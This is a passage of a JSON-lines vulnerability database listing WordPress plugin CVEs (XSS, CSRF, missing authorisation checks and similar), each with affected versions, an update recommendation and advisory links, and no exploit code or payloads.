version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-membership\\\/trunk\\\/inc\\\/options.php#L1364\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-membership\\\/trunk\\\/inc\\\/options.php#L1364\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318389\\\/#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318389\\\/#file0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d80417bc-2bb2-4826-be03-796a7cd2825f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d80417bc-2bb2-4826-be03-796a7cd2825f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7046","slug":"portfolio-elementor","versionImpact":"3.2.0","versionEndExcluding":"3.2.1","description":"The Portfolio for Elementor & Image Gallery | PowerFolio plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom JS Attributes of Plugin's widgets in all versions up to, and including, 3.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\r\nThe issue was partially fixed in version 3.2.0 and fully fixed in version 3.2.1","recommendation":"Update to version 3.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-elementor\\\/trunk\\\/elementor\\\/elementor-widgets\\\/image_gallery_widget.php#L492\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-elementor\\\/trunk\\\/elementor\\\/elementor-widgets\\\/image_gallery_widget.php#L492\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-elementor\\\/trunk\\\/elementor\\\/elementor-widgets\\\/portfolio_widget.php#L541\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-elementor\\\/trunk\\\/elementor\\\/elementor-widgets\\\/portfolio_widget.php#L541\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318503\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318503\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11f01584-e389-4551-b151-f3f0686d1d5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11f01584-e389-4551-b151-f3f0686d1d5d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6455","slug":"elementskit-lite","versionImpact":"3.2.0","versionEndExcluding":"3.2.1","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.2.0 due to a missing capability checks on ekit_widgetarea_content function. This makes it possible for unauthenticated attackers to view any item created in Elementor, such as posts, pages and templates including drafts, pending and private items.","recommendation":"Update to version 3.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c336530-09b2-4ead-923f-f1a6266e3e8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c336530-09b2-4ead-923f-f1a6266e3e8e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.2.0\\\/modules\\\/controls\\\/widget-area-utils.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.2.0\\\/modules\\\/controls\\\/widget-area-utils.php#L15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2628","slug":"kivicare-clinic-management-system","versionEndExcluding":"3.2.1","description":"The KiviCare WordPress plugin before 3.2.1 does not have CSRF checks (either flawed or missing completely) in various AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. This includes, but is not limited to: Delete arbitrary appointments\/medical records\/etc, create\/update various users (patients, doctors etc)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e0741e2c-c529-4815-8744-16e01cdb0aed\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e0741e2c-c529-4815-8744-16e01cdb0aed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2627","slug":"kivicare-clinic-management-system","versionEndExcluding":"3.2.1","description":"The KiviCare WordPress plugin before 3.2.1 does not have proper CSRF and authorisation checks in various AJAX actions, allowing any authenticated users, such as subscriber to call them. Attacks include but are not limited to: Add arbitrary Clinic Admin\/Doctors\/etc and update plugin's settings","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/162d0029-2adc-4925-9985-1d5d672dbe75\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/162d0029-2adc-4925-9985-1d5d672dbe75\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2624","slug":"kivicare-clinic-management-system","versionEndExcluding":"3.2.1","description":"The KiviCare WordPress plugin before 3.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as administrator","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc3a841d-a95b-462e-be4b-acaa44e77264\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc3a841d-a95b-462e-be4b-acaa44e77264\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2623","slug":"kivicare-clinic-management-system","versionEndExcluding":"3.2.1","description":"The KiviCare WordPress plugin before 3.2.1 does not restrict the information returned in a response and returns all user data, allowing low privilege users such as subscriber to retrieve sensitive information such as the user email and hashed password of other users","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85cc39b1-416f-4d23-84c1-fdcbffb0dda0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85cc39b1-416f-4d23-84c1-fdcbffb0dda0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5971","slug":"save-as-pdf-by-pdfcrowd","versionImpact":"3.1.0","versionEndExcluding":"3.2.0","description":"The Save as PDF Plugin by Pdfcrowd WordPress plugin before 3.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03a201d2-535e-4574-afac-791dcf23e6e1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03a201d2-535e-4574-afac-791dcf23e6e1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8735","slug":"mailmunch","versionImpact":"3.1.8","versionEndExcluding":"3.2.0","description":"The MailMunch \u2013 Grow your Email List plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.1.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailmunch\\\/tags\\\/3.1.8\\\/admin\\\/partials\\\/mailmunch-admin-display.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailmunch\\\/tags\\\/3.1.8\\\/admin\\\/partials\\\/mailmunch-admin-display.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193789%40mailmunch&new=3193789%40mailmunch&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193789%40mailmunch&new=3193789%40mailmunch&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e45860-16c4-4d13-aad9-c742a8eced37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e45860-16c4-4d13-aad9-c742a8eced37?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5238","slug":"eventprime-event-calendar-management","versionEndExcluding":"3.2.0","description":"The EventPrime WordPress plugin before 3.2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to an HTML Injection on the plugin in the search area of the website.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47a5fbfd-f47c-4356-8567-b29dadb48423\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47a5fbfd-f47c-4356-8567-b29dadb48423\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3295","slug":"user-registration","versionImpact":"3.1.5","versionEndExcluding":"3.2.0","description":"The User Registration \u2013 Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the profile_pic_remove function in versions up to, and including, 3.1.5. This makes it possible for unauthenticated attackers to delete any media file.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/864a3444-0479-4b9f-beca-584a4a9b8682?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/864a3444-0479-4b9f-beca-584a4a9b8682?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.1.5\\\/includes\\\/class-ur-ajax.php#L1111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.1.5\\\/includes\\\/class-ur-ajax.php#L1111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php?rev=3070439#L1115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php?rev=3070439#L1115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070439\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070439\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4251","slug":"eventprime-event-calendar-management","versionEndExcluding":"3.2.0","description":"The EventPrime WordPress plugin before 3.2.0 does not have CSRF checks when creating bookings, which could allow attackers to make logged in users create unwanted bookings via CSRF attacks.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce564628-3d15-4bc5-8b8e-60b71786ac19\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce564628-3d15-4bc5-8b8e-60b71786ac19\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4250","slug":"eventprime-event-calendar-management","versionEndExcluding":"3.2.0","description":"The EventPrime WordPress plugin before 3.2.0 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c271619-f478-45c3-91d9-be0f55ee06a2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c271619-f478-45c3-91d9-be0f55ee06a2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2417","slug":"user-registration","versionImpact":"3.1.5","versionEndExcluding":"3.2.0","description":"The User Registration \u2013 Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the form_save_action() function in all versions up to, and including, 3.1.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the registration form and make the default registration role administrator. This subsequently allows the attacker to register an account as an administrator on the site.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d03459d8-b1f2-4270-a294-403754db1f2f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d03459d8-b1f2-4270-a294-403754db1f2f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/user-registration\\\/commit\\\/d265273aa4dddb24ade929be78c6bf1766f1cf00\",\"name\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/user-registration\\\/commit\\\/d265273aa4dddb24ade929be78c6bf1766f1cf00\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070439\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070439\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0688","slug":"pubsubhubbub","versionImpact":"3.1.4","versionEndExcluding":"3.2.0","description":"The \"WebSub (FKA. PubSubHubbub)\" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23843","slug":"wp-hr-manager","versionImpact":"3.1.0","versionEndExcluding":"3.2.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wphrmanager WP-HR Manager: The Human Resources Plugin for WordPress allows Reflected XSS. This issue affects WP-HR Manager: The Human Resources Plugin for WordPress: from n\/a through 3.1.0.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-hr-manager\\\/vulnerability\\\/wordpress-wp-hr-manager-plugin-3-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-hr-manager\\\/vulnerability\\\/wordpress-wp-hr-manager-plugin-3-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7204","slug":"wp-staging","versionEndExcluding":"3.2.0","description":"The WP STAGING WordPress Backup plugin before 3.2.0 allows access to cache files during the cloning process which provides","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65a8cf83-d6cc-4d4c-a482-288a83a69879\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65a8cf83-d6cc-4d4c-a482-288a83a69879\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4224","slug":"wpforo-advanced-attachments","versionImpact":"3.1.3","versionEndExcluding":"3.2.0","description":"The wpForo + wpForo Advanced Attachments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via media upload names in all versions up to, and including, 3.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gvectors.com\\\/product\\\/wpforo-advanced-attachments\\\/#tab-changelog\",\"name\":\"https:\\\/\\\/gvectors.com\\\/product\\\/wpforo-advanced-attachments\\\/#tab-changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e634dafc-8eb0-406f-93b1-ee1d2b44171d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e634dafc-8eb0-406f-93b1-ee1d2b44171d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4268","slug":"ultimate-blocks","versionImpact":"3.1.9","versionEndExcluding":"3.2.0","description":"The Ultimate Blocks \u2013 WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 3.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b60b53-77bf-4640-bf2b-84e011014623?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b60b53-77bf-4640-bf2b-84e011014623?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/advanced-heading\\\/block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/advanced-heading\\\/block.php\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/styled-box\\\/block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/styled-box\\\/block.php\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/how-to\\\/block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/how-to\\\/block.php\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/image-slider\\\/block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/image-slider\\\/block.php\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/testimonial\\\/block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/blocks\\\/testimonial\\\/block.php\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/gist.github.com\\\/webber-naut\\\/0a8a4f810da286392a43c4614d31712e\",\"name\":\"https:\\\/\\\/gist.github.com\\\/webber-naut\\\/0a8a4f810da286392a43c4614d31712e\",\"refsource\":\"\",\"tags\":[\"Broken Link\"]},{\"url\":\"https:\\\/\\\/www.dropbox.com\\\/scl\\\/fi\\\/zh7t1qsvxkxk2dfhwd7nn\\\/Ultimate-Blocks-Stored-XSS_POC_4.20.24.mov?rlkey=ws16dcu7f6mjd3h9emsqev7jm&e=2&st=fdr7q9h7&dl=0\",\"name\":\"https:\\\/\\\/www.dropbox.com\\\/scl\\\/fi\\\/zh7t1qsvxkxk2dfhwd7nn\\\/Ultimate-Blocks-Stored-XSS_POC_4.20.24.mov?rlkey=ws16dcu7f6mjd3h9emsqev7jm&e=2&st=fdr7q9h7&dl=0\",\"refsource\":\"\",\"tags\":[\"Broken Link\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075315\\\/ultimate-blocks\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075315\\\/ultimate-blocks\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/custom-css\\\/class-custom-css.php?rev=3102541#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/trunk\\\/src\\\/extensions\\\/custom-css\\\/class-custom-css.php?rev=3102541#L173\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108401\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108401\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Product\"]}]"}
{"CVE_ID":"CVE-2024-3513","slug":"ultimate-blocks","versionImpact":"3.1.9","versionEndExcluding":"3.2.0","description":"The Ultimate Blocks \u2013 WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the title tag parameter in all versions up to, and including, 3.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/428b4d6b-a4db-4e60-8c15-24efdfe6aea1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/428b4d6b-a4db-4e60-8c15-24efdfe6aea1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3108401%40ultimate-blocks%2Ftrunk&old=3102541%40ultimate-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3108401%40ultimate-blocks%2Ftrunk&old=3102541%40ultimate-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6568","slug":"flamix-bitrix24-and-contact-forms-7-integrations","versionImpact":"3.1.0","versionEndExcluding":"3.2.0","description":"The Flamix: Bitrix24 and Contact Form 7 integrations plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.1.0. This is due to the plugin utilizing mobiledetect without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da2050ea-70b3-476d-841f-021c3baddf35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da2050ea-70b3-476d-841f-021c3baddf35?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flamix-bitrix24-and-contact-forms-7-integrations\\\/trunk\\\/includes\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flamix-bitrix24-and-contact-forms-7-integrations\\\/trunk\\\/includes\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3138051%40flamix-bitrix24-and-contact-forms-7-integrations&new=3138051%40flamix-bitrix24-and-contact-forms-7-integrations&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3138051%40flamix-bitrix24-and-contact-forms-7-integrations&new=3138051%40flamix-bitrix24-and-contact-forms-7-integrations&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7151","slug":"gm-woocommerce-quote-popup","versionImpact":"3.1","versionEndExcluding":"3.2","description":"The Product Enquiry for WooCommerce WordPress plugin before 3.2 does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4992a4a9-f21a-46e2-babf-954acfc7c5b4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4992a4a9-f21a-46e2-babf-954acfc7c5b4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4749","slug":"post-list-designer","versionEndExcluding":"3.2","description":"The Posts List Designer by Category WordPress plugin before 3.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8afc3b2a-81e5-4b6f-8f4c-c48492843569\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8afc3b2a-81e5-4b6f-8f4c-c48492843569\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5432","slug":"jquery-news-ticker","versionImpact":"3.1","versionEndExcluding":"3.2","description":"The Jquery news ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'jquery-news-ticker' shortcode in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d22d9414-2df9-4528-a426-dce6e83f8d44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d22d9414-2df9-4528-a426-dce6e83f8d44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-news-ticker\\\/trunk\\\/jquery-news-ticker.php?rev=2827068#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-news-ticker\\\/trunk\\\/jquery-news-ticker.php?rev=2827068#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010828\\\/jquery-news-ticker\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010828\\\/jquery-news-ticker\",\"refsource\":\"\",\"tags\":[]}]"}
